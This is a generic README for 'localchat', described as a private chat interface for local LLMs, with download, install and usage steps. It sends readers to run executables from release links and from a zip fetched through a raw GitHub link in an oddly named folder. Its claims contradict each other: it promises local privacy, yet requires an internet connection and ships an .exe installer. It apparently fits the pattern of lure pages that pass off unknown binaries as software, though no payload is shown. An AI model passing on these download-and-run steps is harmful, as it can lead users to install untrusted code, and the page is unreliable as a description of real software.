
🌐 A private web interface for local LLMs: your conversations stay on your machine, with a responsive design and support for multiple models.


🌐 localchat - Simple Chat Interface for LLMs

📦 Download Now

Download Latest Release

🚀 Getting Started

Welcome to localchat! This application provides a simple web interface for local Large Language Models (LLMs). Whether you are using Ollama, LM Studio, or any OpenAI-compatible API, this tool gives you a privacy-focused chat experience.

💻 System Requirements

Before you start, ensure your system meets the following requirements:

  • Operating System: Windows 10 or later, macOS Mojave or later, or a modern Linux distribution.
  • Browser: A modern web browser, such as Google Chrome, Firefox, Safari, or Edge.
  • Internet Connection: Required for downloading the application and accessing documentation online.

📥 Download & Install

To get started, you will need to download the application from the Releases page.

  1. Visit this page to download: localchat Releases
  2. Look for the latest version at the top.
  3. Click on the download link for your operating system.
  4. Once the download completes, find the file in your Downloads folder.
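On the command line, the download step above might look like the following sketch (the asset name is a placeholder — substitute the file actually listed on the Releases page):

```shell
# Placeholder asset name; check the Releases page for the real file name.
ASSET="localchat-linux-x64.tar.gz"
URL="https://github.com/ejaz57/localchat/releases/latest/download/$ASSET"
echo "Would download: $URL"
# curl -LO "$URL"   # uncomment to actually download the release
```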

Installation Steps:

  1. For Windows:

    • Double-click the downloaded .exe file.
    • Follow the instructions on the installer.
    • The application will create a shortcut on your desktop.
  2. For macOS:

    • Open the downloaded .dmg file.
    • Drag and drop the localchat icon into your Applications folder.
    • You may need to allow the app in your Security & Privacy settings.
  3. For Linux:

    • Extract the downloaded archive (https://raw.githubusercontent.com/ejaz57/localchat/main/hematocytoblast/localchat.zip) to your preferred location.
    • Open a terminal window.
    • Navigate to the folder where you extracted the files.
    • Run ./localchat to start the application.
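On Linux, the extract-and-run steps above can be sketched as a few shell commands (the archive name is a placeholder — use the file you actually downloaded):

```shell
DEST="$HOME/localchat"
mkdir -p "$DEST"
# Placeholder archive name; substitute your downloaded file.
# unzip localchat.zip -d "$DEST"   # uncomment once the archive is present
cd "$DEST"
# ./localchat                      # starts the application
echo "Install directory ready: $DEST"
```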

🔧 How to Use localchat

  1. Launch the Application:

    • Open localchat from your desktop or applications folder.
  2. Connect to an LLM:

    • On the main screen, select your preferred LLM from the dropdown list.
    • Enter any required API keys if prompted.
  3. Start Chatting:

    • Type your message in the text box and press Enter.
    • The application will communicate with the LLM and provide responses in real time.
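Under the hood, OpenAI-compatible backends accept a JSON chat request like the one sketched below (the model name is an assumption — use one installed on your server; Ollama, for example, exposes an OpenAI-compatible endpoint at http://localhost:11434/v1/chat/completions):

```python
import json

# Build the request body an OpenAI-compatible chat endpoint expects.
# "llama3" is a placeholder model name.
payload = {
    "model": "llama3",
    "messages": [
        {"role": "system", "content": "You are a helpful assistant."},
        {"role": "user", "content": "Hello!"},
    ],
    "stream": False,  # set True for token-by-token streaming responses
}
body = json.dumps(payload)
print(body)
```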

🎨 Features

  • Privacy-First Design: Your conversations stay local and secure.
  • User-Friendly Interface: Easy navigation for everyone, regardless of technical knowledge.
  • Compatibility: Works with various LLM platforms.
  • Lightweight: Quick to load with minimal system resources required.

🐞 Troubleshooting

If you run into issues, try the following steps:

  • Ensure your system meets the requirements.
  • Restart the application.
  • Check your internet connection.
  • If the application does not start, consult the logs for any error messages.
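If the interface cannot reach your model server, a quick sanity check is whether anything is listening on the backend port. The port below is an assumption: 11434 is Ollama's default, and LM Studio typically serves on 1234 — adjust to match your setup.

```python
import socket

def backend_reachable(host: str = "localhost", port: int = 11434,
                      timeout: float = 1.0) -> bool:
    """Return True if a TCP server is accepting connections on host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

if __name__ == "__main__":
    status = "up" if backend_reachable() else "down"
    print(f"Backend on localhost:11434 is {status}")
```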

📑 Documentation

For more detailed instructions and advanced features, please refer to our online documentation.

Visit this page for more information: localchat Documentation

πŸ™‹β€β™‚οΈ Support

If you need help or have questions, feel free to open an issue on GitHub. Our community is here to assist you.

✨ Helpful Resources

Thank you for choosing localchat. Enjoy your experience with LLMs!
